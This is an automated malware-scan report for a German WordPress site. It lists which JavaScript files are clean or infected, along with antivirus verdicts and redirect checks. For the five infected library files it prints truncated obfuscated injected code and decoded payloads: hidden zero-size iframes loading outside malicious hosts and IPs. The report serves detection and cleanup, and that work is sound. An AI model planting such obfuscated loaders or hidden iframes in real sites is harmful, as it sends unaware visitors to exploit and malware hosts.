New scan:

Malware Scanner report for neuverschuldung-stoppen.de

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "neuverschuldung-stoppen.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=neuverschuldung-stoppen.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://neuverschuldung-stoppen.de/
200 OK
Content-Length: 16127
Content-Type: text/html
clean
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/l10n.js?ver=20101110
200 OK
Content-Length: 6118
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!103!114!101!103!97!114!116!46!99!111!109!47!105!110!4
... 2953 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborde
... 87 bytes are skipped ...
op:45%; left:45%; border:5px solid gray; padding:40px; padding-top:10px; background:#fff; text-align:left;"><span style="color:gray; cursor:pointer; margin-bottom:20px; display:block;" onClick="$(this).parent().hide()"><img src="http://77.81.240.235/waiting.gif"></span></div><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Agent.GGJ
Emsisoft
Trojan.JS.Agent.GGJ (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
NANO-Antivirus
Trojan.Url.IframeB.bmlwta
F-Secure
Trojan.JS.Agent.GGJ
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Agent.GGJ
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Agent.GGJ

http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/jquery.js?ver=1.4.4
200 OK
Content-Length: 82746
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof
... 3103 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Emsisoft
Trojan.JS.Iframe.AXN (B)
Comodo
TrojWare.JS.Redirect.crk
K7GW
Backdoor ( 04c529a51 )
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
Cyren
JS/IFrame.AU
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88
200 OK
Content-Length: 33706
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05
200 OK
Content-Length: 4424
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.core.js?ver=1.8.9
200 OK
Content-Length: 8450
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.9",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,<
... 3073 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Comodo
TrojWare.JS.Redirect.crk
Emsisoft
Trojan.JS.Iframe.AXN (B)
K7GW
Backdoor ( 04c529a51 )
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
Cyren
JS/IFrame.AU
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.widget.js?ver=1.8.9
200 OK
Content-Length: 7399
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(b,j){if(b.cleanData){var k=b.cleanData;b.cleanData=function(a){for(var c=0,d;(d=a[c])!=null;c++)b(d).triggerHandler("remove");k(a)}}else{var l=b.fn.remove;b.fn.remove=function(a,c){return this.each(function(){if(!c)if(!a||b.filter(a,[this]).length)b("*",this).add([this]).each(function(){b(this).triggerHandler("remove")});return l.call(b(this),a,c)})}}b.widget=function(a,c,d){var e=a.split(".")[0],f;a=a.split(".")[1];f=e+"-"+a;if(!d){d=c;c=b.Widget}b.expr[":"][f]=function(h){return!!b.d
... 3089 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Emsisoft
Trojan.JS.Iframe.AXN (B)
Comodo
TrojWare.JS.Redirect.crk
K7GW
Backdoor ( 04c529a51 )
DrWeb
SCRIPT.Virus
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
Cyren
JS/IFrame.AU
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
Agnitum
JS.Cored.A
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.ui.datepicker.js?ver=3.1.4
200 OK
Content-Length: 77814
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms-datepicker.js?ver=3.1.4
200 OK
Content-Length: 2794
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.tools.min.js?ver=3.1.4
200 OK
Content-Length: 120135
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms.js?ver=3.1.4
200 OK
Content-Length: 3502
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/cufon.js?ver=3.1.4
200 OK
Content-Length: 20931
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/quicksand.font.js?ver=3.1.4
200 OK
Content-Length: 62503
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.4
200 OK
Content-Length: 16851
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/flashplayer/flowplayer-3.1.4.min.js?ver=3.1.4
200 OK
Content-Length: 18634
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){r
... 3048 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


function () {
__flash_unloadHandler = function () {};
__flash_savedUnloadHandler = function () {};
}
<div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

AntiVir
JS/iFrame.EB.357
Microsoft
Exploit:HTML/IframeRef.DH
VIPRE
Malware.JS.Generic (JS)
AVware
Malware.JS.Generic (JS)
ESET-NOD32
JS/Iframe.DM


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 02 Sep 2014 02:48:22 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aqq2mbk62hjr59v5ehr9qh2hn5; path=/
X-Pingback: http://prototype.neuverschuldung-stoppen.de/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Referer: http://www.google.com/search?q=neuverschuldung-stoppen.de

Result:
The result is similar to the first query. There are no suspicious redirects found.